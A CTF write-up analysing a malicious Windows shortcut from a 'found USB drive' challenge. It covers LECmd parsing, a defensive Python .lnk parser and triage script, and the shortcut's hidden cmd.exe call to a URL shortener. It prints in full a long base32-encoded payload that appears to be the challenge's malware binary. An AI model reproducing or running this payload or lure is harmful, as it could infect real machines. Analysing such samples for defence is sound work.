Thumb drive

Thumbdrive

Challenge: People say you shouldn’t plug in USB drives! But I discovered this neat file on one that I found in the parking lot…

First, I checked what kind of file it was:

shanna@ubuntu:~/Downloads$ file ADATA_128GB.lnk.download 
ADATA_128GB.lnk.download: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=30, Archive, ctime=Sun Nov 21 11:24:03 2010, mtime=Sun Nov 21 11:24:03 2010, atime=Sun Nov 21 11:24:03 2010, length=302592, window=hidenormalshowminimized

So I used LECmd.exe from EZTools to parse the link file:

Source file: C:\Users\shanna\Downloads\huntress-ctf-malware\ADATA_128GB.download
 Source created: 2023-10-31 00:10:54
 Source modified: 2023-10-31 00:11:33
 Source accessed: 2023-10-31 04:14:46

--- Header ---
 Target created: 2010-11-21 03:24:03
 Target modified: 2010-11-21 03:24:03
 Target accessed: 2010-11-21 03:24:03

 File size (bytes): 302,592
 Flags: HasTargetIdList, HasLinkInfo, HasName, HasArguments, HasIconLocation, IsUnicode, HasExpString
 File attributes: FileAttributeArchive
 Icon index: 30
 Show window: SwShowminnoactive (Display the window as minimized without activating it.)

Name: ADATA 128GB
Arguments:    /V/R  CMD<https://
Icon Location: inyurl.com/a7ba6ma??????????????e

--- Link information ---
Flags: VolumeIdAndLocalBasePath

>> Volume information
 Drive type: Fixed storage media (Hard drive)
 Serial number: 4E595676
 Label: (No label)
 Local path: C:\Windows\System32\cmd.exe

--- Target ID information (Format: Type ==> Value) ---

 Absolute path: My Computer\C:\Windows\System32\cmd.exe

 -Root folder: GUID ==> My Computer

 -Drive letter ==> C:

 -Directory ==> Windows
  Short name: Windows
  Modified:  2019-09-30 12:50:02
  Extension block count: 1

  --------- Block 0 (Beef0004) ---------
  Long name: Windows
  Created:   2009-07-14 03:20:10
  Last access: 2019-09-30 12:50:02
  MFT entry/sequence #: 624/1 (0x270/0x1)

 -Directory ==> System32
  Short name: System32
  Modified:  2022-02-25 11:06:08
  Extension block count: 1

  --------- Block 0 (Beef0004) ---------
  Long name: System32
  Created:   2009-07-14 03:20:12
  Last access: 2022-02-25 11:06:08
  MFT entry/sequence #: 2313/1 (0x909/0x1)

 -File ==> cmd.exe
  Short name: cmd.exe
  Modified:  2010-11-21 03:24:04
  Extension block count: 1

  --------- Block 0 (Beef0004) ---------
  Long name: cmd.exe
  Created:   2010-11-21 03:24:04
  Last access: 2010-11-21 03:24:04
  MFT entry/sequence #: 36705/1 (0x8F61/0x1)

--- End Target ID information ---

---------- Processed C:\Users\shanna\Downloads\huntress-ctf-malware\ADATA_128GB.download in 0.14865680 seconds ----------
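LECmd reads the fields above straight out of the MS-SHLLINK structures: a 76-byte ShellLinkHeader (flags, icon index, show command), an optional LinkTargetIDList, an optional LinkInfo (where the local path C:\Windows\System32\cmd.exe lives) and then the StringData fields (name, arguments, icon location) in a fixed order. The following added example, which is not part of the original write-up or of LECmd, does the same walk in Python and adds a small triage pass that flags the traits seen in this shortcut (interpreter target, URL in the string fields, window started minimized). The .lnk bytes it parses are a constructed sample built by build_sample_lnk; the volume serial, file size and show command are borrowed from the LECmd output above, and the argument and icon strings are placeholders, not the real lure.

```python
import struct

# MS-SHLLINK: every .lnk opens with a 76-byte header carrying this fixed CLSID.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_FMT = "<I16sIIQQQIIIHHII"          # packs to exactly 76 bytes
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01     # LinkInfoFlags bit
# StringData fields always appear in this order, each present only if its flag bit is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
# Any ShowCommand other than these three is treated as SW_SHOWNORMAL by the spec.
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}


def _read_cstr(data, offset):
    return data[offset:data.index(b"\x00", offset)].decode("latin-1")


def parse_lnk(data):
    """Return header fields, the LinkInfo local base path and the StringData of a shell link."""
    if len(data) < 0x4C:
        raise ValueError("too short to be a shell link")
    (hdr_size, clsid, flags, _attrs, _ct, _at, _wt, fsize, icon_idx,
     show_cmd, _hk, _r1, _r2, _r3) = struct.unpack_from(HEADER_FMT, data, 0)
    if hdr_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad header size or CLSID)")
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList; LinkInfo gives us the path
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    local_base_path = None
    if flags & HAS_LINK_INFO:
        (li_size, _li_hdr, li_flags, _vol_off, lbp_off,
         _cnrl_off, _suffix_off) = struct.unpack_from("<7I", data, pos)
        if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            local_base_path = _read_cstr(data, pos + lbp_off)   # offset is LinkInfo-relative
        pos += li_size
    strings = {}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)   # character count, not byte count
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + width * count]
            strings[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += width * count
    return {"flags": flags, "file_size": fsize, "icon_index": icon_idx,
            "show_command": SHOW_COMMANDS.get(show_cmd, "SW_SHOWNORMAL"),
            "local_base_path": local_base_path, **strings}


def triage(info):
    """Defender heuristics: the traits that made this shortcut worth a closer look."""
    findings = []
    target = (info.get("local_base_path") or "").lower()
    if target.endswith(("cmd.exe", "powershell.exe")):
        findings.append("target is a shell interpreter: " + target)
    if "://" in (info.get("arguments") or "") or "://" in (info.get("icon_location") or ""):
        findings.append("URL embedded in arguments/icon location")
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("window starts minimized and unfocused")
    return findings


def build_sample_lnk(name, arguments, icon_location, local_path):
    """Construct a minimal Unicode .lnk (sample data for this example, not the CTF file)."""
    flags = HAS_LINK_INFO | HAS_NAME | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, flags, 0x20,   # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0, 302592, 30, 7, 0, 0, 0, 0)         # size, icon 30, SW_SHOWMINNOACTIVE
    # LinkInfo: 28-byte header, VolumeID (16 fixed bytes + empty label), then two NUL-terminated strings.
    volume_id = struct.pack("<IIII", 17, 3, 0x4E595676, 16) + b"\x00"   # DriveType 3 = fixed
    path = local_path.encode("latin-1") + b"\x00"
    vol_off, lbp_off = 28, 28 + len(volume_id)
    suffix_off = lbp_off + len(path)
    link_info = struct.pack("<7I", suffix_off + 1, 28, VOLUME_ID_AND_LOCAL_BASE_PATH,
                            vol_off, lbp_off, 0, suffix_off) + volume_id + path + b"\x00"
    string_data = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                           for s in (name, arguments, icon_location))
    return header + link_info + string_data


if __name__ == "__main__":
    sample = build_sample_lnk("ADATA 128GB", "/c PLACEHOLDER https://example.invalid/PLACEHOLDER",
                              "https://example.invalid/PLACEHOLDER", r"C:\Windows\System32\cmd.exe")
    info = parse_lnk(sample)
    for key, value in info.items():
        print(f"{key}: {value}")
    for finding in triage(info):
        print("!!", finding)
```

The parser deliberately skips the LinkTargetIDList and relies on LinkInfo for the target path; on a real sample with ForceNoLinkInfo set you would need to walk the IDList as LECmd does. Because the StringData count is a character count, a Unicode link needs twice that many bytes per field, which is where hand-rolled parsers usually go wrong.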

From the info I see the icon location of inyurl.com/a7ba6ma??????????????e, which I interpreted to be hxxp://tinyurl.com/a7ba6ma??????????????e, and I was correct: a text file called usb.txt was downloaded with the following contents:

JVNJAAADAAAAABAAAAAP77YAAC4AAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AAAAAAOD65A4AFUBHGSDOABJTGSCVDINFZSA4DSN5TXEYLNEBRWC3TON52CAYTFEBZHK3RANFXCARCPKMQG233EMUXA2DIKEQAAAAAAAAAAAZ3NYOZSGDFN4ARQZLPAEMGK3YBKOQ7OAIIMVXQIE65M4EQQZLPAQJ52RYJJBSW6BAT3VHQSSDFN4CBHXLXBEIGK3YBXM6WOCJQMVXQCGDFM4ABQZLPA2F52JYJCBSW6BUL3VXQSEDFN4DIXWUXAEIGK3YGRPOX6CIQMVXQFE2LDNARQZLPAAAAAAAAAAAAAAUCFAAAEYAIFADLX6VTCAAAAAAAAAAAABYAAAIQQWAIODYABAAAAAAKAAAAAAAAAABIVAAAAAEAAAAACAAAAAAAAAEAACAAAAAACAAAAMAAAAAAAAAAAAYAAAAAAAAAAAADAAAAAABAAAAAAAAAAAIAEAAIAAAIAAAAQAAAAAAAQAAABAAAAAAAAAAAQAAAABUBGAAAGYAAAAA6COAAAMQAAAAAAIAAABYABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQAAAGYAIAADQCCAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUBCAAAEAAAAAAAAAAAAAAAAAAAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXHIZLYOQAAAAE3BYAAAAAQAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAACAAAAMAXHEZDBORQQAADOBIAAAABAAAAAADAAAAABIAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXGIYLUMEAAAAEMAMAAAABQAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAAAEAAAAYAXHE43SMMAAAAHAAEAAAACAAAAAAAQAAAACEAAAAAAAAAAAAAAAAAAAAAAEAAAAIAXHEZLMN5RQAADMAEAAAACQAAAAAAQAAAACIAAAAAAAAAAAAAAAAAAAAAAEAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACVRPWID3C4AEAABIIEGAABAM6FRFC7YDZIAVQCCAAQGPAA6EMFUT7P776HQU2P7777GMAAAAAPFACRAIIACAHRDBNU73777R4FHD7777ZGAAAAADZIAXACCAAQB4IYLRH67774OROMK4AAAAAPFAC3AIIACAHRDBOU73777R2F2BNQAAAAB4UALUBBAAIA6EMF4T7P77YPFACYAIIACAHRDBPU73776DZIAUACCAAQB4IYKBH7777Q6KAF2AQAAEAPCGCRJ77774HSQBJAEEABADYRQUSP7777B4UALIBBAAIA6EMFHT7777YPFAC4AIAACAHRDBKM77776DZIAWICCAAQB4IYKXH7777Q6KAF
KAQQAEAPCGCWZ77774HSQBLQEEABADYRQV6P7777B4UAKMBBAAIA6EKFRQHSQBPQEAABADYRIWOA6KAF4AQAAEAPCFC2YDZIAVACCAAQB4IULPDGB4PYIAAAAAAAAD5WRSCTZ77774ZIZBNE73777CCMAXKA7NUMQVAP7777GKGILKH6777YQTAF2WB4AAUD7ATHFUTKABUKYIAACCGULVCQNIAP6FJUEAABBC2N7QZ4AM6N5A5AAAAARPSV3QQEADGMZTGMZTGMZTGMZTGMZTCVRPWIG3IMAF2RK2QANIAGUADIAAIAAEDKABVAB7YVAAQAAEFYAEAAAAC5YIGAAOYNAQYAAEDVAHB6TCYDAAAFLC7MRNCQZA7IAB2DHA7IAF2CBA7IAF2BDA7IAF2AKM6AIDVTB2AIAYAAB2YF5DRAKAAAB63MB2Y7752RB73VBDUBQAAAABM6WEEDPUIAAD4VYAH3NQCQ5AGACAAALFO4EDAANIIGQQBGAAIOQXAJAAAGUAHIG4DAAACZQTAA7BGRAAAAB2BOAUAABCCF4OZQDCC546BWL7AAQM6VQMYACAAA7BOFAAAABRYFLAZQAEABAAAAB2DDAUAABBGAORG6ROQIAAAOQ4YEAAAOREQEAAAGRBBAAAIGRABAAAIOQ4ALAAAFSWMFYB2ST2ALAUAABBGAOQQGQ7BAAAIGQ6BAAAIOQTALAAAFSWOHAVMDGAAQAIAAAABS3OEF3Z6HIX6P577777UD2AAAACCNW5KD5A2AOAAARPYIGPQAOQPVN2COAYAAAWMEYB2BJ73VBRVAF73VBCFTNC6O74KXAIAACD75N7YFDAYAAEBTYBAOWD4KLXT765PD5CZQMAAALHBTHQELJXYGJCINAAAAAACZL5PFXSODNID6RYYGAAAMY2QQNBQCMAAQ5BKQQAAAUEMDAAAQQXAH6BBTYDVWSSFDDAYAAEBT75DYS7PEQNS7YAHIDICAAAEIIXQIS7P4QM6VQMYACABHK27I2ECAAAHIRABQAAHI4UDQAAEDEVMDGAAQACBWL7AA5A4QAAAANIAP65II5BHAMAAALFMQ7NXQ67PBX5RD66EXLZGHIX6P577777UCEAAAACF4NC2N6BSISDIAAAAAAWK7LZN4TQ4LPXSP65PA5D5AKAAALHBYW5PE5CHQIAAAYNVAP2BTAYAABTDKBRUIQJQACDUKKBYAACFX2DEF752Q6OJ5DAYAAED7A4Z4B2OZAAAABA3F7QAIH7YBOQFIH7YCOQCYWXIQ5MYYWXIQKNL765II5DEQAAAARPYIS5PEQX3A7BFDAAAAAU2X752QR2E57X777C7QRF26JBPWB6CIYAAAABJVP73VBDUFD7P776F7BCLV4SB76ALVE6C7M5JDKNIP65II5A473777QXNQ7FOAB63MAUHIXL7P772ZKNLP65II5BVAAAAAQX7XIBMD74BXKSCTK77XKCHIIL67774L6CEXLZEF6Z2DKU2X752QR2CEAAAABC7Q5MSIWTPMRMAVD7ZQNDCRCAAQ752RB73VBT7XKCHIJEBQAAEDYQMMHC3F5AZ7NCLV4TDUL7H677777C6GRNG7AZEJBUAAAAAALFPV4W6JYNKYX3CWRM22AIAACCC7M5IFGPAEB2YT752RBC6O752QZ73VBD7RK4BAAAIP7VS6LXBAYACVRPWIG7IMAF2QL2EEAEAAB73VCD7XKDH7OUEORLX6777YHRAMLXBAYACVRPWGUAH7CUUCAAAQ752QR7YVFQQAAEDIBECABQH7CUSCAAAQKD7RKIBAAAIF3Q2VRPWID3BEAMAAA2QX74KRYIAACCC4A5AFNIBFTTJJUMQDCAAQREGRYMIACCERKGBRAAIISHIUGEABBCJVCAYQAEEJHUGDCAAQM2GBKOBRAAIGNDANFQYQAEDGRQOQQMIACBTIYBIEGEABAZUMEUADCAAQM2GC37BQAAIJZDYFGAYQAEELIUAKGJBR
AAIIWRIEUMUDCAAQRVCQRIZUGEABBC4F3T6P776HAVYDAAAQAEAACAFBFAYQAEFDFQYAAEGHAUQDAAAQBECABQGHAUSDAAAQAEAAAAGHAUYDAAAQAEAAAADKARMGXQAAY6ADIMAACABAAAAANICFQ26AACFQ2BBQAAIISTAF7BVAIWGB4AAIWDIAGAABBCKMAX4GRJBAAAIORYH67774TQ2VRPWIH3AUQNS7IAENIX2IGZPYABIP6FIMEAABBC2F7AZUL5EJIX6P6FIQEAABAMKF7T7RKFBAAAIDCRP4RVC6YUH7CUMCAAAQRNC7BDKN7QZUL3BTIX6DHQOJYOFQ2BBQAAIFMV57J3TEBO56AAAP77Z3Z52AJBOOOUTORFH7777YXSB3Z52QPOKP4ZALX2YOQXHHKCQNCFDQAAGB4AIAXSEJBUCDAAAQ67IV7CINAAYAAEC6YNUEAMYACD7RKCBAAAIMG2CAGMABB2HDAYAAAWODXBEDGAAQYO4FAMYACDB6R377777YWSAEQMECJCKIATUOP77776FUQBEDBABISSAEYNKYX3ELIUEFNC2IHQB4QD5XIEKI2UIYAPIA7N2BAZV7AKAD6I55M5AZRNGQYO2KBRZAVC2CBABUEDB3ZBZAZA6CFA55M5PKGPAF4XODRPBOX6KW5BRAMAAAQXAHIIDEUEMAAAAAXZODGAAQRNIAJ2YEHPIHIEBTYCF4V4APWEHILQDV6AZMAXWDWAAV5Q7IGEDAAAEFYB2AP2CQAQAAB2YY5AOQMAAAKDUEWBQAABMYLQDUAMZMBQ7IIQDAAAFQAHBWUAHI2AAAAAEEYBMQ7FOAYPUEMBQAACCMA5IDGLAMH2B2AYAABBGAOUD6QMIGAAAOX3NQAHB6QJYGAAAOQIQGAAALAAODKWF6Z2GJAUAABBOAOUMYG7IMAF2RH73VCCFU2FCQ752QR7YVOAQAAEH7KUKP65I4752RR2GLAUAAAWKZLXB6RGAFAAAILQDUBRUGIMYACDUMYBIAABM4H2GUAUAABBOAB6CMGBIAADBWUAHIYECQAACZ5G5QKAAAKWF6ZA35BAAHKB6GAVQDGAAQAHUIAAYAADUKCBIAACCMA5IEGLAF3Q7ISQCQAAEEYB2QU2QA5CEQKAAALHV6TMABLXBVLC7MQA6WCMYACAAHIBFQAFO4GVULOUEIL5TUAWB74ALVMLUBEBIAACC4A5BGQX3HKITIMQZQAEHIHQCQAACZQXAHKD3IOAZQAEHIFUCQAACZQXAHIKZSYDVTBA6J76EQ2ZBTAAIISDLIGMABBCINNQZQAEEJBVYDGAAQREGXIMYACCEQ26BTAAIMMBLBGMABAANQAFPF3Q3KAXUOAAAAADGGUCDIVATAAEHIKIBAAAEDMX6ABOCNLIAAAZRZAUAAAAAQOVO2CPAAAAIIDOAAAAABAUCFAAAHKTFZBMAQAADGHGEBQAAACB2T5C2FBC4QAAAACAV4CUCR5CZ73777LFMYLQDUE6BXQJAAPQQ4ORP47377775QAHVR7C2F5SFQAM6JQE4AKAAAYAHZJQMLYHBYWZPIY5C7Z7X7777TFQELJXYGJCINAAAAAACZL5PFXSODKWF6Z2ARAQAABBOAOQHYA7IIAB2QSM6AXFODGAAQQ4AV3Q2VRPWIAPLAGMABAADUA2AH2DAAOUJP65II5AYAIAAA752QR2BIAQAAAWKZWAAV3Q5YRAZQAEGDKWF6ZAPMEQBQAACTNIL76FI4EAABBBOAOQCYWTIIZUUWUA7I7EAAAAGHAQSMYAQAACGYLXH4777WUACQ5CUQGAAAQPCAZCMFRT67774JRWEP3777RGKYJ7P776EZ3AH5777YTNL47X777CN5PD67773GRSK2J7P775TIZDMY7X776ZUMTV2P3777M2GIK4H5777WNDFFNT67773GRSWWR7P776OI7BM47X777C2FASEYLFH5777Y2RIERGC2B7P777DYLXH4
777QCAABACFUB7DKKCEYLEH5777Y2RNINIAFB2A7AMAABC2FASB4IDGHIWUBKAAAIDDULLABAAAABCKFWT7RKBBAAAIGUAENLD77PW4NIWUISRPYRWC5Z7H774NNXCKF7T7MH7YVFAQAAEENIX4FB7YVFQQAAEEFYB2QZBG3OUEGUA7IAQAAAACZLPE4HAZFPQZQAEAAYNJVNPRQEYABBOZQEYABAO7TOMMVPCZ6QX7XICULZ77RK4BAAAIP7V4DYYCDX43S5FPV4W6DKNLL4OBGAAILWOBGAAIDX43TDFLYWPUF752AVC6P74KXAIAACD75PA6GAQ57G4XJL5PFXQ6MZTGMY2GFDMABAZH7GUAAAAAARNCCIEEJNQSBBDLMEQICXYCTKZL2CBBQAAIDCRP4GPCVBCLF5D7XL6ELIX6MORP47377774JIX4I2RPQMSRQAAAAADBVLC7MK2FXKCH7G3UFAAQAAD7XKFEJA37XKEH7OUGFM2FXCEABA2AEGAABB2HZAEAABA6EDRPF3Q6CAAAFLC7MQMSYAMYACAAIH3BEQMGRAMAACAAWUCX7CUOCAAAQQXAA7BFMAEAABA3F6AADHQCTKZLTHSMNPXOFGD5CRPZVXEEJA6EXOBEJJ4EDHSMJK4GIWRO4RN66BCKF6SA7OR3FNZ2YWRPIGVUW4ZKJRFC7ZC2F4Q2W45DFNSEUL6BTYBAFGD5CRPZVXEENLXOISA4LIX6AWRPYBPDYS4YERFFQRCKTBR2UHC2F3QS7AP77B464ABQBAB2CGPLAAYBAA5A4HVYAMAQAOQKT2UAGAMAHIDR5MADAGADUA46XABQDAB2RDCZ5QQZQAEEDZ4AYSPMEGMABB2YGRM6YIMYACCFU3ZDKA5MISTP4HFC7I7BQGPEVGD5CRPZVXEENLXOISA4JOMCISSYIRNG7ZCKTBSFV3YHXYMAAEAAAOQHIHTYCRE6YIMYACDVQHC256CQRAMAACCB4QAWHAWADGAAQAEAAAAFDCAYAAEHXYEAAAEAAB6CJGAAAACB4QBGHAWADGAAQAIAAAAFDCAYAAEHXYEAAAAAIOR47PQIAAAABA5DRGPEQ6AOQRFC6ZCKV6CFUL3ELJXYGUBS6EPDDXRTVK6QRAMAACCB4QCGHAWADGAAQAMAAAAFDCAYAAEHWYMQHIO4DZAQMOBMAGMABABIAAAAKGEBQAAILQAAAAPICHWB33B2R5C2F5S5OAAAAACFU34BDYI54E5INQMGRAMAACBAISNMAGMABAX26LMZ4BSODGPAEBQZTYA4QKFBQAAIA7FOAYP7SKPBAAAIP6JKAEAABB7ZFIQQAAEH7EVICAAAQ74SVYIAACD7SKZBAAAIP6JKYEAABB7ZFNAQAAEH7EVGCAAAQ74SWAIAACD7SKVBAAAILAAODGPAMGVML5RIYGPMAGMABAAL4M2AX2CFUAIAMA5AJQF6QRNICADAHKVAPVZO7ZC2F7SB7AP5IQF2D7KIEAIAAA5IHXCHAAAGAZHB2SAQBAAAHIKVJBACAAADVA64JCAAAYDE4HKIQBAAAA5IHXCJQAAGAZHB2SIAQAAAHKDVYR4AABQGJYO4JAAAAYDE4HC2FBDE4GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAUAAAC2FIAAARBKAAACUKQAAAKCUAAA7YUQAAHEFEAABSBJAAALIKIAACQCSAAAQIUQAADGFEAAAAAAAAAC4KAAAAAAAAAAJAUAAADIFAAAA4RIAAAAAAAAAADCSAAATYUAAAB2FEAABSRIAAAKUKAAAARCSAAAXAUAAAHEFAAAAAAAAAAPIGYACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAGAABA4BQAAIFS33VOIQGM3DBM4QGS4Z2AAAAAAAAAAANGAAAADUQAAAA6AAAAAALAAAABGAAAAAFMAAAACFAAAAACYAAAAH6AAAAA3QAAAALWAAAAARAAAAABQAAAABAAAAABFAAAAADQAAAAA2QAAAACAAAAAHXAAAAAXIAAAAKQAAAADMQAAAASEAAAADNAAAAAKAAAAAAQAAAABUQAAAATMAAAAFLAAAAAFQAAAAGIAAAACSAAAAAJMAAAADOAAAAADAAAAAKQAAAADJAAAAA7QAAAAFGAAAABPIAAAAIIAAAADDAAAAAXUAAAAF7AAAABRYAAAAAKAAAADTAAAAAYAAAAAE4AAAAA5IAAAAAOAAAADDAAAAAHIAAAABTAAAAA7AAAAANKAAAADRAAAAAVIAAAAG4AAAABWAAAAALGAAAADFQAAAASIAAAAG6AAAAACAAAAAAWAAAABFQAAAA4YAAAAFBAAAAAZAAAAAN6AAAAD2QAAAAAAAAAAGXP5LGEAAAAAAAEAAAAB5AAAAALQRQAAC4C4AAAAAAAAANO72WMIAAAAAABQAAAAAUAAAABWBDAAANQFYAAAAAAAAA257VMYQAAAAAADIAAAAEAAQAADWCGAAA5QLQAAAAAAAABV37KZRAAAAAAAHAAAAAAAAAAAAAAAAAAAAAAAALYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIMAACBACGAAQAEAAAADQEAABAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEIIYACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2CAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMKGYAAAMAAAAAACAABAAAAAAAAAAAAAAAAAAAAAAAAAAAKJJUIU4CP246B5MC6BEJDZE7PKHSXBX4AQAAAACDHJOFK43FOJZVY2TPNBXFYRDPO5XGY33BMRZVY2DFNRWG6LLXN5ZGYZBNMRWGYLLNMFZXIZLSLRUGK3DMN4WXO33SNRSC2ZDMNQWW2YLTORSXEXCSMVWGKYLTMVOHQOBWLRUGK3DMN4WXO33SNRSC44DEMIAAAAAAAAAAAFIAAAABKAAAAAAAAAAACQAAAACHINKEYAAQAAAJWDQAAAXHIZLYOQSG23QAAAAAAABAAAAHAAAAAAXGSZDBORQSINIAAAAAA4BAAAAAQAAAAAXDAMDDMZTQAADYEAAAABAAAAAC4Q2SKQSFQQ2BAAAAAAD4EAAAABAAAAAC4Q2SKQSFQQ22AAAAAAEAEAAAABAAAAAC4Q2SKQSFQSKBAAAAAAEEEAAAABAA
AAAC4Q2SKQSFQSK2AAAAAAEIEAAAABAAAAAC4Q2SKQSFQUCBAAAAAAEMEAAAABAAAAAC4Q2SKQSFQUC2AAAAAAEQEAAAABAAAAAC4Q2SKQSFQVCBAAAAAAEUEAAAADAAAAAC4Q2SKQSFQVC2AAAAAAFAEAAABIACAAAC44TEMF2GCAAAIARQAAAEAAAAALTSMRQXIYJEON4GIYLUMEAAAACEEMAAAGAAAAAC44TEMF2GCJDWN5WHI3LEAAAAAXBDAAANAAQAAAXHEZDBORQSI6T2PJSGEZYAAAACYJQAAACAAAAAFZZHIYZEJFAUCAAAAAADAJQAAACAAAAAFZZHIYZEJFNFUAAAAAADIJQAAACAAAAAFZZHIYZEKRAUCAAAAAADQJQAAAEAAAAAFZZHIYZEKRNFUAAAAAAEAJQAACIAAAAAFZ4GIYLUMESHQAAAAAANAJQAABWAAAAAFZSWIYLUMEAAAPBHAAAFAAAAAAXGSZDBORQSIMQAAAAABDBHAAABIAAAAAXGSZDBORQSIMYAAAAABIBHAAAHAAAAAAXGSZDBORQSINAAAAAAAEBIAAAF4AQAAAXGSZDBORQSINQAAAAAAABQAAABQAAAAAXGIYLUMEAAAAAYGAAAA5ADAAAC4YTTOMAAAAAAABAAAADAAAAAALTSONZGGJBQGEAAAAAAMBAAAAEAAEAAALTSONZGGJBQGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA737777YAAAAABUH7777QAAAAAD7P7777AAAAAAHYCIABAAAAAAAP577774AAAAAA2D7777YAAAAAB7X7777QAAAAAC7BGAAQAAAAAAAAAAAABMITAAIP577774AAAAAA2T7777YAAAAAB7X7777ZUFAACC4RIAAQAAAAAAH677776AAAAAANR77774AAAAAA7377774HDEABBGQZAAIAAAAAAAAAAAAAAAAAAAAAAAAAB777777QAAAAAAGCOAAAAEAAAAACAAAAAAQAAAAPQJQAAAACOAAABATQAAEQCEAAAAAQAAABYJYAAAUCOAAAAAAACADIMVWGY3ZNO5XXE3DEFZSGY3AAL5CGY3CNMFUW4QBRGIAF6TLFONZWCZ3FIJXXQVDIOJSWCZCAGQAKAJYAAAAAAAAAAAAAAABAFAAAAABAAAANIJYAAAAAAAAAAAAAAAB4FAAAANBAAAANYJYAAAAAAAAAAAAAAAEMFAAAAPBAAAAOYJYAAAAAAAAAAAAAAACEFEAAATBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAKAAABNCUAAAIQVAAABKFIAAAFBKAAAP4KIAADSCSAAAZAUQAAFUFEAABIBJAAAIEKIAABTCSAAAAAAAAABOFAAAAAAAAAAEQKAAABUCQAAAOIUAAAAAAAAAABRJAAAJ4KAAAA5CSAAAZIUAAAFKFAAAAIRJAAALQKAAADSCQAAAAAAAAAHWABBXEZLBORSVI2DSMVQWIAAAJNCVETSFJQZTELTENRWAAAEBAJ